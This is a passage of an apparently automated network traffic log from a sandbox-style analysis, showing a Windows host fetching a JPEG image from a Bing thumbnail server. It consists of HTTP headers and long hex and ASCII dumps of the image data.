04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF``ExifMM*bj(1r2i``Adobe Photoshop 25.2 (Windows)2023:12:29 09:11:058
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: 99 3c b7 fe 2c 6d 6a db b0 b7 7f 2d 52 35 e3 6d 64 43 76 3c 9f 2c af fb bb bf 84 d6 ee 8e 26 12 65 3e 68 fa d6 8a 3a a5 d0 c7 9f dd 6c b5 6f a7 49 d6 4a 95 ec a2 6e 5d 77 6d fe 2a b0 f7 21 61 6d ff 00 29 ac bb 9d 48 a6 e7 0d c7 45 fa d6 af 95 23 17 27 7d 4c cd 52 1c 5d 28 0d f2 b3 7c df ec d7 55 e0 79 ad 8d bf f6 64 92 b7 96 b9 78 ff 00 a8 ae 76 18 9a ee e1 4c 8b b4 7f 7b fb b5 d2 69 3e 1f bd b8 ba 58 34 ad df 37 de 95 b8 db 9a f3 67 51 cd e9 b1 a5 2a 8e 2e f1 45 9b 1b 3f b5 59 dc c5 13 79 7b a5 3b 77 7f 3a e8 fe 14 e8 c3 46 9a e8 fd ef 3f 1f bc 6f ba de d5 7b c3 3e 11 b4 d2 57 cd bd 9d a7 95 b9 db bb e5 cd 6c cd 71 07 96 b1 c6 aa ab b8 05 db ef c5 65 5e 2d d1 6d ee 7a 38 6d 6a c5 b5 a9 c1 f8 89 03 cd 79 24 fb 56 36 dc 23 da de 95 81 a7 ea 17 30 5c 45 2a Data Ascii: <,mj-R5mdCv<,&e>h:loIJn]wm!am)HE#'}LR](\|UydxvL{i>X47gQ.E?Yy{;w:F?o{>Wlqe^-mz8mjy$V6#0\E*
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: 1d 2e d2 16 56 10 2c 67 77 f0 fd da b6 b0 c6 db 93 6f 15 2b ec db 55 de 41 d4 7c a5 6b 44 db 33 e5 4b a1 1b 69 f6 d1 4c d2 88 b7 33 7d ed df d2 b2 35 5d 3f 50 b8 be 8e e2 3d 42 58 a2 8f fe 58 47 f7 5b 9e a7 de b7 da 41 2c 6b bf 6a 95 fe 2f ef 55 5b 89 44 31 b1 76 e1 79 dd 58 e2 74 a3 27 72 a9 c5 39 24 70 3a 96 95 aa 5c 4d 22 5e fc b1 c6 db fc d8 d8 7e fb 27 b8 f5 15 1c 36 12 69 f6 f2 07 d5 e3 6b b9 72 63 f3 17 e4 50 3f 5a 67 fc 24 f7 ba 86 b1 2c 49 63 fe 83 b8 85 92 55 d9 bb fa d6 7d d6 af 73 a8 f8 a3 fb 1e cb 4f 59 e5 8d 33 1b 2b 6e 66 dd cf 1d b0 05 79 30 a7 59 d3 f6 dc a6 92 85 3b b8 ad f6 2c 5e 5d 78 96 ce e2 0f b2 41 6d 24 4c b9 96 54 60 bb be 9d ea f6 93 7b 25 e5 9b 47 6d 2d cc b1 79 a0 b7 9f 39 f9 bf bc 3d 6a 4b 1f 0d f8 a2 f1 64 4b 88 23 8a 28 d4 Data Ascii: .V,gwo+UA\|kD3KiL3}5]?P=BXXG[A,kj/U[D1vyXt'r9$p:\M"^~'6ikrcP?Zg$,IcU}sOY3+nfy0Y;,^]xAm$LT`{%Gm-y9=jKdK#(
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: fb be e2 93 c2 3e 0e 3a 65 f3 5c 4f 2f 9a 63 c6 d6 fe b5 da 58 69 a6 1e ab f7 7e ee da 4d 49 2d a1 b5 67 bc da b1 71 eb f8 1e 29 54 95 b6 1c 20 b7 64 3b 4c ec d1 86 68 f6 e3 ee fa d4 7a a2 f8 c2 f2 39 65 b3 b9 b6 93 6e 51 63 5f dd ae 08 18 fc 46 de b9 a4 4b 88 df e7 81 bf 76 bf 77 6f a7 ae 6b a8 f0 dd b1 93 4d 91 dd b6 f9 ec 0c 7f 85 79 f5 aa 4e 1a c7 73 d2 85 28 4e dc c7 93 f8 9a 6f 10 eb 4d f6 3d 43 cc 59 20 93 ef 33 7d ee 30 72 7f 8b 15 83 e2 0d 1a 7b 16 67 b7 69 19 a3 8c 7d e6 f9 59 ce 70 71 ec 2b d4 7c 75 64 17 50 92 78 7e 53 27 f1 57 29 e2 65 21 62 f4 db 57 42 b5 4a ed 73 13 5b 0d 4a 8c 1f 2a 38 fd 1f 50 f1 3c 93 36 27 92 35 6c 06 59 17 e5 f7 c5 7a 56 95 70 45 bc 6b 2c aa b2 32 8d cb bb ef 11 5c cd 89 4d b9 da b9 ad 8b 0f de 6d 40 bb 8e ef e2 5f 97 Data Ascii: >:e\O/cXi~MI-gq)T d;Lhz9enQc_FKvwokMyNs(NoM=CY 3}0r{gi}Ypq+\|udPx~S'W)e!bWBJs[J*8P<6'5lYzVpEk,2\Mm@_
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: 64 45 1f 96 17 69 fa fa 57 4d f0 e5 64 4f 0d dc cb 73 fe b6 59 d4 36 e5 0a ab b4 67 b7 a1 35 81 24 e8 8a b2 6e f9 57 fb ab bb ad 76 fa 1a db da f8 4e d8 16 ff 00 5a a6 46 5f f7 8e e3 5c 78 a8 aa 89 43 b9 d5 86 7c 8d c8 f2 cf 14 69 51 cf e2 6b a9 4f 98 de 7c 83 6a ee f9 98 b1 ef ec 28 d7 ad e2 8a 49 22 83 6f 97 d3 fd 96 c0 ae c7 56 16 0b a8 49 78 8b 1f 9b 1c 65 d5 b7 7d de 38 fc 4d 71 77 f7 10 4b 70 c7 e6 5f 98 1d bf 51 cd 52 a6 a2 cd 15 46 d1 4b 45 97 c8 d4 ad a5 1d 63 9f e6 66 fe 10 46 2b bd b7 72 5b 23 e6 2a b8 da ad f7 ab ce a3 61 73 78 c2 3f 95 64 c1 8f f0 af 44 b1 de 23 c6 e5 f9 7f f1 e1 5a d1 8e e6 58 99 2d 0b 39 27 68 ed bb ee b7 a5 55 ba b3 8a 46 c2 7b fc cb 8d dc f6 ad 04 02 4b 59 1f 72 af 97 19 76 6f ee 81 d6 a8 e8 f7 1a 65 e5 8f da ec ee 63 92 Data Ascii: dEiWMdOsY6g5$nWvNZF_\xC\|iQkO\|j(I"oVIxe}8MqwKp_QRFKEcfF+r[#*asx?dD#ZX-9'hUF{KYrvoec
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: d8 68 ba 92 de e9 f1 dc 48 ad 1e ef 91 95 bd 7a 76 f7 ae 6e 4d 15 2d ae 96 4f dd b0 93 26 48 d5 77 75 ee 3d 2a 77 93 6c 2b 67 12 fe ee 4f e2 93 ee b6 7e f0 1e f5 94 a5 c9 24 ba b2 1d db d4 ea 1a 60 59 5e 35 65 1b 41 fe f5 32 49 63 b7 ff 00 5b 3a c7 fd d5 6f 4a e5 2d f5 89 ec f4 ff 00 b4 bd b4 f2 b3 4b e5 ac 51 fc ec bb 4e 32 7b 8f a5 74 de 55 be a1 0a c7 2c 4b 26 dc 3a ab 2f cc a6 b4 6d de c5 c2 cc 8a e6 5b b4 68 cc 16 ca d1 ed cb 49 e6 00 dc fa d5 a9 25 75 87 cf db b8 aa e7 f7 7f 35 39 6c a2 65 c4 9f bc 2a df c5 f9 d1 79 72 90 48 b0 ed 65 59 17 ef 2a ee e7 d3 da a4 d9 a1 13 61 db 71 23 79 7e 6a fd da cb d6 a3 96 e7 52 b6 4b 7d db 57 f7 8c cb 26 dd b8 e9 95 fe 21 5a 17 c4 42 ad 3f 94 d2 46 ab f3 2c 7f 7b 9e c3 35 c4 c8 97 83 54 b9 92 dd 9a 05 93 27 6b 67 Data Ascii: hHzvnM-O&Hwu=wl+gO~$`Y^5eA2Ic[:oJ-KQN2{tU,K&:/m[hI%u59leyrHeY*aq#y~jRK}W&!ZB?F,{5T'kg
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: 67 9f e2 5f e5 53 68 7e 2e d4 57 4b 51 6f a1 da 5b 49 cb 47 f3 17 dc 07 5c 8a d6 b0 31 dc ac 40 4b ca e4 ee 6f 95 98 7a 1c d6 ff 00 86 ed b4 89 f5 0f b0 3f 97 14 92 36 55 b6 85 dc 7d 3e a6 b3 c4 e5 f4 ab 4d 54 49 26 6f 09 62 28 e9 09 68 71 d0 9f 19 f8 9d 56 52 cb 67 6b 1b 65 76 ae c7 6e e3 1f 4a da 4d 1e c9 6d e4 3a c5 cb 4f 77 2c 7e 77 98 bf 7d 82 f5 da 3f ce 6b d4 ac f4 7b 78 63 54 45 5d aa bf 2d 3d 74 7b 29 2e 16 73 02 f9 91 2e 23 6d bf 76 aa 14 29 52 49 6e cc a3 42 73 97 3c db 6d ff 00 5b 6c 73 da 0e 8d 69 1d ac 4e 8a ca 36 fc ac de 86 b6 23 b1 b7 8e 3f 2e 38 b7 0f f6 ab 52 4b 18 8c 78 7e 9b 81 f9 7d aa 64 40 17 62 6d 51 5b 73 c5 2b 45 68 6b 1a 5d 6e 63 c3 a6 44 93 34 b1 c4 ab 24 9f 79 bf bd 52 ff 00 65 db 8b 8f b5 c9 12 f9 cb 1e 16 4f e2 c7 a5 5d 92 Data Ascii: g_Sh~.WKQo[IG\1@Koz?6U}>MTI&ob(hqVRgkevnJMm:Ow,~w}?k{xcTE]-=t{).s.#mv)RInBs<m[lsiN6#?.8RKx~}d@bmQ[s+Ehk]ncD4$yReO]
2024-12-07 09:51:21 UTC	16067	IN	Data Raw: ad fc 55 a3 e2 6f 1e 4b 25 af 98 25 f2 c6 e3 b7 a7 e7 58 b6 01 bf b2 e5 d3 b4 fb 19 e7 96 4f bd 22 b0 dc bf 8f b5 53 f0 de 95 67 6d ab 48 fa ea ac 7e 54 7f bb 8e 5c ba b1 fa 2f 00 e3 d6 b2 a7 74 af 75 72 65 52 f4 dc 62 ad 13 a3 d2 fc 75 25 c5 f4 44 6e 6d d8 dd f8 57 49 ff 00 09 35 cd dc cd 6d 60 90 2c db 77 af cd f7 47 73 b6 af f8 3f c2 96 fa be 9f 1e a8 f6 76 d1 69 52 c1 96 58 98 2d c4 c4 1c 2a f1 9d 8b f8 e7 e9 56 f5 0f 0e 78 5a d7 4f fe cf 5d 16 da 39 27 e1 9a db 2a f1 fd 5c 9c 9f e5 5c dc b3 ad 3f 75 d8 f4 28 e1 ea d3 a7 ef bd cf 3a f1 75 b6 ab ac 4d 14 b6 73 cf 38 5c b7 ef 57 cb dc 33 cf 3c 0a f5 7f 82 b6 b7 73 f8 7d be d7 2a c8 de 60 0b e5 b6 ff 00 90 7f b4 6b c2 3e 22 0d 43 42 d6 1a c2 2b 99 e5 10 7d cf 9b e5 64 3d 3e 95 d8 fc 13 f1 c5 ee 9f a6 c9 Data Ascii: UoK%%XO"SgmH~T\/tureRbu%DnmWI5m`,wGs?viRX-VxZO]9'\\?u(:uMs8\W3<s}*`k>"CB+}d=>
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: 7f 30 6d ce 70 38 eb 8a 52 9a 82 bc 8c 9b 7d 0d db 8f 2f c3 b0 f9 71 34 6d 2c 8c 43 37 dd 66 e3 a5 2f c7 b9 b5 38 f4 db 1d 2d f6 c7 0d ac 40 ca aa df f2 d3 ee 9f af cc 0f 3d fe 95 c8 35 ae a3 e2 0d 62 d7 4b 82 e5 56 ea 7b b8 e3 6f 33 2c b1 e4 80 5d 8f 65 ef 5d 07 c7 ab fd 32 e3 c4 d7 56 fa 5c f2 4f b6 40 b2 4b 22 ed f3 88 ee 3d bb d7 8d 8c 6a ad 68 be da fe 87 ab 96 a9 41 4d be b6 5f 71 b3 f0 3f 42 b2 bc f0 ac 77 77 b1 2c be 5d cc 92 6d 91 77 2e 72 30 7f 0d b5 9f a5 f8 77 5b 5f 8a da ad ce 95 2a c6 b2 33 79 f3 af cd b4 49 ce d1 9f e2 38 ad ef 82 f6 e7 fe 11 78 a2 96 75 58 e7 59 0c 6b ff 00 3d 31 c1 6c 7a 0a ef b4 ad 2e cb 49 56 11 2e e9 27 6d f2 33 75 62 7b 9a ba 6d d8 e8 a9 4e f3 77 ea 70 1e 21 d2 27 d3 b4 3b 38 e7 d4 20 92 e2 2b b6 99 a5 93 e4 f2 d0 a1 Data Ascii: 0mp8R}/q4m,C7f/8-@=5bKV{o3,]e]2V\O@K"=jhAM_q?Bww,]mw.r0w[_*3yI8xuXYk=1lz.IV.'m3ub{mNwp!';8 +
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: ca f2 37 ca bf 75 6b 72 db 4e 44 5f 9d b9 ab 51 db c6 92 29 db 4f eb 11 8a b4 48 fa bc e5 b9 9d 6b 68 9b b6 18 95 57 fc 2a e2 e2 16 54 fb c1 a9 ee 63 32 30 1d 7f d9 a8 2e ae 6d f6 e2 39 d5 8a b6 24 fe 25 53 59 fb 67 2d 8b 58 74 b7 13 52 97 10 ef ef d2 b0 21 bd 8e 6b 89 22 82 56 6f 2a 4c 49 fd d5 23 b1 ad 0b cb 90 ea a4 f4 8f 8d bf de a4 d1 f4 99 75 09 24 2f 13 45 0b 49 bd 99 bf 8b ff 00 af 59 4e b3 4c e8 a7 87 8d 8e 53 56 69 6f ff 00 b4 6c ef 6c e4 97 4b 68 be 69 d9 86 cc b7 1b 48 f6 f5 af 07 f8 5d ad a6 81 ab 49 a2 18 be 68 ef 98 48 bb 76 ed 04 e2 be be d5 74 e8 0f 87 6f 2c e2 b6 59 16 48 18 79 3f f3 d3 8e 9f 5a f8 79 35 0b 9b 8f 88 52 ea 71 d9 f9 31 de 48 c7 6e ec f9 7c e0 a9 f7 15 e7 e2 22 e6 dc ad 75 63 d1 c3 ce 30 49 27 ad cd ef 1c 8f 23 c4 12 cb 61 Data Ascii: 7ukrND_Q)OHkhWTc20.m9$%SYg-XtR!k"VoLI#u$/EIYNLSViollKhiH]IhHvto,YHy?Zy5Rq1Hn\|"uc0I'#a

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49723	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:20 UTC	375	OUT	GET /th?id=OADD2.10239340418540_1UQTKN6JO04LNXB5Q&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-12-07 09:51:21 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 676162 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: D87F88253C2B4D2E8968E08D028DA485 Ref B: EWR30EDGE0710 Ref C: 2024-12-07T09:51:21Z Date: Sat, 07 Dec 2024 09:51:20 GMT Connection: close
2024-12-07 09:51:21 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 1a 6c 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 32 3a 31 30 20 32 32 3a 34 39 3a 33 36 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF``lExifMM*bj(1r2i``Adobe Photoshop 24.1 (Windows)2023:02:10 22:49:368
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: da 51 49 1e ab 27 97 1c 91 4d fe af fd fa f9 ba 7d 3e 4f be 95 63 ec 72 24 35 6b 0e 9e c2 e7 67 d4 90 5c da 4b e5 a4 17 90 c9 24 91 f9 91 f9 52 ff 00 ac 4f ef 54 1a e6 ab a6 e8 ff 00 66 7d 46 f2 1b 64 b8 93 ec f1 f9 bf df af 98 b4 db 9d 4a d3 cb fb 2d e4 d1 c9 1f fa b9 22 97 fd 5f f1 7c b5 bd aa eb 5a ef 88 34 98 ed 75 4b cf b6 c1 6f 27 99 1f 99 f7 ff 00 bb 50 e8 3b ee 3f 69 e4 7b d6 9b af e8 ba 84 3b ec b5 2b 49 23 fb 4f 91 fe b7 fe 5a ff 00 76 ab eb 1a f6 9b 65 35 b2 49 a9 43 1c 97 bb 3e cd fb df f5 95 e1 5f 63 fb 24 3b d3 fe 59 ff 00 cb 5a ab 75 04 92 f9 73 a4 d3 79 96 f2 7e ef fe 99 d5 2a 2a e1 ed 3c 8f 75 d5 3c 55 a6 e8 93 79 17 b3 79 93 c9 fe ae da 2f bf 59 31 fc 4f f0 f4 50 dc be a9 f6 bb 7f 2e 47 f2 ff 00 75 bf cc 4a f3 49 be d7 a9 ea 1f 6d d4 66 Data Ascii: QI'M}>Ocr$5kg\K$ROTf}FdJ-"_\|Z4uKo'P;?i{;+I#OZve5IC>_c$;YZusy~**<u<Uyy/Y1OP.GuJImf
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: 49 17 fc b4 a8 24 b9 b8 48 a4 b2 f3 bf 71 1e ff 00 2e 3f f7 aa 49 20 fb 25 a4 9b ef 3f 79 25 65 cf 2f ef a3 7f fb 67 5d 11 4a c6 27 d7 df 09 ef 2e fc 41 f0 b7 40 d6 b5 48 61 fb 75 e5 92 49 2f 95 fe cb ec dd fe f1 d9 cd 74 3f 63 4a e0 3f 64 54 9b fe 14 ef 98 f2 f9 90 c9 ab 5c fd 9e 3f f9 e1 f7 77 7e 6d 5e 9d b6 b1 72 61 ca 8c d9 2c e3 a6 fd 9b 65 6a 6d a8 a4 5a 1c ae 3b 14 3c ba 23 5a b9 24 54 dd b4 ae 16 22 8d 69 79 a7 6d 34 52 18 51 4d e6 9d 4a c3 b8 53 79 a7 51 48 60 95 25 47 4e a9 90 d3 b0 ea 36 d1 bb de 9b 49 ab 0f 98 8a 48 aa 2d b5 6a 4a 6c 8b 56 49 5f 6d 36 a7 d9 51 6d aa 00 a3 6d 14 50 48 da 6f 35 25 35 e8 02 19 16 9b b6 a6 e6 93 65 50 11 53 76 9a 93 6d 1b 68 15 88 24 8a 9b e5 55 9d b4 6d a0 2c 41 e5 51 b2 a5 91 69 bb 4d 01 62 ac 90 54 32 2d 68 48 Data Ascii: I$Hq.?I %?y%e/g]J'.A@HauI/t?cJ?dT\?w~m^ra,ejmZ;<#Z$T"iym4RQMJSyQH`%GN6IH-jJlVI_m6QmmPHo5%5ePSvmh$Um,AQiMbT2-hH
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: 57 f9 1c 9e b1 69 1d a6 9f f2 7e ee 3a 9f c3 9e 1e bf bd d2 7e da 90 cd e5 ff 00 cf 49 7e e5 5a f1 34 5e 6e 93 f3 cd fb cf f5 7e 65 3e d7 57 8f 4a f0 9d b5 ac 13 7e f2 38 df f7 9e 77 f1 b5 78 ae ac e5 05 c9 bd ec 7b 9c ba 9c f5 f4 1e 55 dc 70 3f fd fc ab 5a aa c9 14 db 2e a1 9a 3f dd a7 fa df f9 68 ed fe cd 62 4f 73 71 71 fb ff 00 f9 61 1e cf fc 76 a1 d4 a2 d4 9e ee 4d f0 f9 72 79 8f fe fd 75 c6 2d b5 76 62 3f ca ff 00 4b f9 3c ef dd d5 db 59 6e ef 75 0f 3f c9 f3 24 ff 00 59 1c 75 9b 26 99 3c 50 c8 f3 cd 0f fd fd a8 a3 b6 9d 3c b7 ff 00 57 e6 47 fb ba df 46 b7 31 3a 39 ff 00 d2 3f d1 5e 6f f5 7f f4 d6 b2 e4 f3 d6 69 11 21 9a 4f 2e 3f 2e 4f ee 6f ff 00 65 ab 4a 3d 1e 3b 78 63 9d fe c9 1f 97 1f 99 24 92 cb e7 3f f9 f6 ab df f0 8e 3a 78 7a c6 e9 26 b4 f3 24 Data Ascii: Wi~:~I~Z4^n~e>WJ~8wx{Up?Z.?hbOsqqavMryu-vb?K<Ynu?$Yu&<P<WGF1:9?^oi!O.?.OoeJ=;xc$?:xz&$
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: f2 f6 5c 5c ff 00 69 4a f6 f3 41 ff 00 5d 25 5f 96 38 f7 7c bf 7a bd 43 e2 6c f0 27 80 ef 92 eb 52 9b 4e 82 4d 91 c9 73 14 48 fe 5e e7 ff 00 6e be 49 f1 a6 bd a4 dd 78 86 3b 5b a9 be d1 63 f6 d4 b8 b6 8e 28 93 67 cc ff 00 7f fd ff 00 fa e8 d5 f2 dc 41 8c f7 e3 84 b3 e5 6a ee df 91 ac 3b 9d 2f 87 5b c4 be 0f f1 3f 88 34 8d 53 58 d2 74 6b e9 24 49 23 d1 7c af 3a ce ed 19 37 6e 79 17 e4 da a9 f7 3f f1 ea 83 c7 1e 38 bb f8 81 a7 e9 36 ba 8d 9f f6 76 ab a2 dc cd 24 91 ea 57 6f 0a 5d fd cd be 5b 47 ff 00 3c bf 87 f9 d7 a4 7c 2e f1 06 93 e0 fd 27 5b d3 b5 0d 1f fb 47 4e b7 d9 24 5f da 52 c3 34 df 36 77 f9 92 7f ab 45 fe 15 dd fe ed 50 f1 57 82 35 2f 11 43 7d e3 2b 2f 86 3e 13 d5 63 d5 ad 92 e2 3f b3 6a 0f 37 d9 1e 4f 97 7c 11 47 b3 cb 7f 2f 66 ef f6 eb 86 9c a9 Data Ascii: \\iJA]%_8\|zCl'RNMsH^nIx;[c(gAj;/[?4SXtk$I#\|:7ny?86v$Wo][G<\|.'[GN$_R46wEPW5/C}+/>c?j7O\|G/f
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: 3f 39 2d 20 db f2 ad a5 ba f4 79 42 fc ce ed ba b8 df 8d 9a 7e b3 af 5d d8 ea 1a e6 a7 61 66 f1 c7 f6 49 3f e2 61 e7 79 11 2f fa b4 d8 bf dd f6 ae 7a 74 6a d7 9c 63 52 6e 10 95 f6 56 7a 2e cd 5f fc 8d 6a 4e 2e 2e fb 9e ab e3 4f 8d d6 f6 5f 07 7c 39 a1 59 43 15 9c 12 5c cd 26 a3 27 9a 93 7d cf b9 b1 78 29 f2 d7 0b e1 cf 88 33 ea ba b4 6f ff 00 08 af 99 6b e6 79 91 f9 7f 7e 48 bf 87 fd ec 56 27 86 fc 33 e1 64 b4 b6 d5 3f b4 a2 d7 b5 4f b4 bf 97 6f f3 ec 75 5f 97 f7 9b ff 00 bd 5d 0f c4 0b 2b 8f 0b ea 16 5a d7 83 b5 18 bc 9b 8d 26 6f b3 c9 65 2f fa 3b b3 7e ee e7 fd c6 db f2 06 fb d4 de 13 2e 8c d6 1f 95 f3 3b a4 dd d7 cb 7f cf cf cc 99 7b 39 2b c9 ec 90 9f 18 bc 63 a1 5c 78 82 c8 49 2c b2 41 6d 64 90 5c db db 7f aa bb 5f ef 46 ad fe fe e6 7f e2 a6 eb 7a bc Data Ascii: ?9- yB~]afI?ay/ztjcRnVz._jN..O_\|9YC\&'}x)3oky~HV'3d?Oou_]+Z&oe/;~.;{9+c\xI,Amd\_Fz
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: fd 52 e2 54 fb 46 95 fd 9f f6 b8 a3 dd fe ab cd 6d eb fe f1 d8 b5 e1 e2 30 78 4a 11 bf b4 f7 9c d4 ae f5 69 ae 8b 47 6e ab ae ec de 8c 6a 5d c2 0e d7 dc f5 df 08 e9 57 5f f0 aa 75 19 f4 cf 0e 6a de 21 98 d9 24 1a 0d 95 e8 f2 9e ee 79 36 79 f7 3e 67 f7 b3 ff 00 2d 7f b8 8f 5a 3e 26 d0 64 d2 f5 0b 1d 53 51 d4 7f b5 7c 5b fb 9b bd 47 51 8a ed 21 b1 b0 45 7d be 52 7c bf ea f6 fc bb ea 87 8a 3e 28 f8 9f c1 1e 19 d5 9e e3 42 bc bc 9a 3b 24 b4 f0 ed ed cc a9 f6 7d 4e 5d 9f bc 91 95 3e ef cf f7 61 fb db 2b cb bc 0f f1 2b c4 9a 27 87 75 5b 6f 88 56 b7 72 43 25 ca 3c ba ac 72 a7 d9 de d6 5b 6f 2d e1 d9 fc 4f ff 00 3c ff 00 bb 5f 29 57 05 8b a9 19 38 a4 ec f4 bb f7 a4 9d ae 92 d9 ad 7c 9b 7a 74 d3 b7 0b 52 34 d2 53 b7 e6 76 3f 12 35 0b fd 6a 59 2e ac 74 89 ad e0 bc Data Ascii: RTFm0xJiGnj]W_uj!$y6y>g-Z>&dSQ\|[GQ!E}R\|>(B;$}N]>a++'u[oVrC%<r[o-O<_)W8\|ztR4Sv?5jY.t
2024-12-07 09:51:21 UTC	16067	IN	Data Raw: a4 da fb 99 7f 79 f7 2b bf 99 f2 7b c7 35 92 76 39 ff 00 f8 43 2c 3c 25 0e a5 e2 87 9b ed 17 76 52 7d 92 48 ef a5 47 49 2e 25 4f 9f e5 ff 00 66 bc 6f c7 17 32 6a be 27 fd fc d0 c7 27 c9 1f 99 ff 00 2c 7f f1 da ed 2f ac f5 24 d7 3e ca fa 94 d7 1f 67 8b ed ff 00 66 b9 8b c9 fe 3f 93 e4 ff 00 6a b2 fe 21 69 97 1a 7f c5 8f 23 51 fd e4 fe 5c 37 1f bd 8b e4 92 59 13 ee ed fe ed 76 51 8b b5 d9 8c a4 93 39 c9 2d 23 b5 d7 2c ad 6d 65 fb 44 76 f2 a4 7f 68 92 2d 9b db f8 fe 5a 8b 52 59 25 d5 a4 82 f6 6f df c7 fb bf 33 ff 00 41 ad 4b 5b 98 35 0d 5a fa ea f7 ce 8e 4f b4 f9 91 c7 6d 15 69 6b 1a 54 7a 9f 84 e4 ba 82 68 64 be d3 bf e7 af df 91 3f bb 56 d2 6c 9d 8e 3f 55 d3 f6 5a 7e e3 ce 93 ff 00 43 8e a9 c0 b1 f9 3e 7b fe f3 fe 99 d6 a5 8d f5 a4 bf 24 ff 00 eb 23 a6 5f Data Ascii: y+{5v9C,<%vR}HGI.%Ofo2j'',/$>gf?j!i#Q\7YvQ9-#,meDvh-ZRY%o3AK[5ZOmikTzhd?Vl?UZ~C>{$#_
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: ee 6c 6a 53 c7 fe 8d 3f 93 e6 47 58 3a e5 e4 8f 77 ff 00 2c 7c bf f9 e7 5a 1e 7f da 2d 24 ff 00 a6 92 7f e3 95 8b a8 c1 3d c6 a1 b1 21 f3 24 93 fe 59 c5 58 50 a4 a3 2f 7b a0 ca 77 53 c7 e7 49 1c 30 d5 7a ea 2c 7c 39 07 d9 23 fb 6f fa ff 00 fa eb 58 9a 96 9b 25 a7 99 fb e8 64 8e 3a e9 a7 5a 9b 7c a8 39 1a 45 0d bb 28 dd 4e 4a 27 59 13 ef ff 00 d7 4a d9 b4 95 d9 43 d1 a9 f6 b0 3d c4 de 5c 1f eb 24 92 a7 d3 6c fe d1 0c 77 49 34 32 41 27 ef 3f 75 2f fe 3b 5b 7a 6c 51 db f9 93 cf 0c 3e 67 fd 33 ff 00 96 75 cb 2c 44 12 f7 19 50 8f 73 2e eb c3 db 7c bf 22 6f fa e9 e6 d4 7f d8 be 54 df 3c de 64 75 ad 75 a9 c1 e4 ec 4f fb 65 e6 d5 58 f5 3f fa 63 0f ee eb 38 d5 ac d1 5e eb 2c 40 d3 a4 d2 27 fc b3 a8 75 29 60 49 64 d9 fb c9 23 ff 00 57 51 c6 b2 5c 43 e7 cf 37 97 1f Data Ascii: ljS?GX:w,\|Z-$=!$YXP/{wSI0z,\|9#oX%d:Z\|9E(NJ'YJC=\$lwI42A'?u/;[zlQ>g3u,DPs.\|"oT<duuOeX?c8^,@'u)`Id#WQ\C7
2024-12-07 09:51:21 UTC	16384	IN	Data Raw: fd 75 9d dc 91 ff 00 d7 2a 75 f4 be 6c d1 ff 00 cb 39 23 ff 00 a6 55 89 af 31 56 cd 67 4b 5d 89 fb bf 33 fe 5a 51 22 ec 8a b5 d2 c6 4b 7f 0f c9 3c df bb 9f cc f2 fc b9 3e ff 00 cd ff 00 d8 d6 5d 8c 5f 68 bb 8e 0f f9 e9 27 97 fe b6 b4 5b 21 3d 59 d0 f8 47 4f 82 f7 c4 91 cf 8f df d9 d9 bc f2 27 fc f4 6f e0 db f9 8a f5 7f d9 26 77 b7 d4 3c 5b 37 fc b3 b8 fb 34 7e 5f fc 0e 47 ae 27 e1 4e 97 a9 ea fa a6 b5 26 9f a8 c5 65 b2 44 82 e2 3f b2 3b fe eb fb bf 2f dc 5a f5 4f 82 10 da c1 e1 dd 69 ed a2 f2 ee 9f 5a 78 e4 f2 fe e7 ee 92 3f bb 5b e1 d2 95 45 73 87 1c ed 45 fc 91 e9 b6 b2 ef f9 12 1f 32 ad 58 c1 27 9d e4 